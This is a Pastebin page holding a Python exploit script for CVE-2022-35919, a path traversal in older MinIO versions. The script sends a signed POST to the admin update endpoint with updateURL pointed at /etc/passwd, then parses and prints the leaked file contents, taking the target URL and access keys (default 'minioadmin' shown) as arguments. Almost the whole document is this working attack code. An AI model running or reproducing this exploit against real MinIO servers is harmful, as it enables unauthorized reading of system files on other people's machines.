Advertisement
FlyFar

Minio 2022-07-29T19-40-48Z - Path Traversal - CVE-2022-35919

Jan 17th, 2024 (edited)
1,023
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.59 KB | Cybersecurity | 0 0
  1. # Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
  2. # Date: 2023-09-02
  3. # Exploit Author: Jenson Zhao
  4. # Vendor Homepage: https://min.io/
  5. # Software Link: https://github.com/minio/minio/
  6. # Version: Up to (excluding) 2022-07-29T19-40-48Z
  7. # Tested on: Windows 10
  8. # CVE : CVE-2022-35919
  9. # Required before execution: pip install minio,requests
  10. import urllib.parse
  11. import requests, json, re, datetime, argparse
  12. from minio.credentials import Credentials
  13. from minio.signer import sign_v4_s3
  14.  
  15.  
  16. class MyMinio():
  17.     secure = False
  18.  
  19.     def __init__(self, base_url, access_key, secret_key):
  20.         self.credits = Credentials(
  21.             access_key=access_key,
  22.             secret_key=secret_key
  23.         )
  24.         if base_url.startswith('http://') and base_url.endswith('/'):
  25.             self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
  26.         elif base_url.startswith('https://') and base_url.endswith('/'):
  27.             self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
  28.             self.secure = True
  29.         else:
  30.             print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')
  31.  
  32.     def poc(self):
  33.         datetimes = datetime.datetime.utcnow()
  34.         datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
  35.         urls = urllib.parse.urlparse(self.url)
  36.         headers = {
  37.             'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
  38.             'X-Amz-Date': datetime_str,
  39.             'Host': urls.netloc,
  40.         }
  41.         headers = sign_v4_s3(
  42.             method='POST',
  43.             url=urls,
  44.             region='',
  45.             headers=headers,
  46.             credentials=self.credits,
  47.             content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
  48.             date=datetimes,
  49.         )
  50.         if self.secure:
  51.             response = requests.post(url=self.url, headers=headers, verify=False)
  52.         else:
  53.             response = requests.post(url=self.url, headers=headers)
  54.         try:
  55.             message = json.loads(response.text)['Message']
  56.             pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
  57.             matches = re.findall(pattern, message)
  58.             if matches:
  59.                 print('There is CVE-2022-35919 problem with the url!')
  60.                 print('The contents of the /etc/passwd file are as follows:')
  61.                 for match in matches:
  62.                     print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
  63.                                                         match[6]))
  64.             else:
  65.                 print('There is no CVE-2022-35919 problem with the url!')
  66.                 print('Here is the response message content:')
  67.                 print(message)
  68.         except Exception as e:
  69.             print(
  70.                 'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
  71.             print(response.text)
  72.  
  73.  
  74. if __name__ == '__main__':
  75.     parser = argparse.ArgumentParser()
  76.     parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
  77.     parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
  78.     parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
  79.     args = parser.parse_args()
  80.     minio = MyMinio(args.url, args.accesskey, args.secretkey)
  81.     minio.poc()
  82.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement